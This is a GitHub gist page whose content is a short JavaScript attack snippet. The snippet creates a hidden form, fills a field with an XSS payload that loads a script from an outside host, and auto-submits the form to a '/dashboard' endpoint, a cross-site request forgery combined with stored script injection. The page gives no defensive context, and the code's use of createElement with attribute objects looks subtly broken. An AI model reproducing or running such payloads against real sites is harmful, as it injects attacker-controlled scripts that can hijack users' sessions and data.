Skip to content

Instantly share code, notes, and snippets.

@graingert
Forked from danpalmer/gist:3398273
Created August 19, 2012 22:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save graingert/3398275 to your computer and use it in GitHub Desktop.
Save graingert/3398275 to your computer and use it in GitHub Desktop.
var form = document.createElement("form", {action: "/dashboard", method: "POST", style: "display: none", onsubmit: "return false;"});
form.appendChild(document.createElement("input", {type: "hidden", name: "21", value: "<IMG \"\"\"><SCRIPT SRC=\"//danpalmer.me/s/lkd.js\"></SCRIPT>\">"}));
document.body.appendChild(form);
form.submit();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment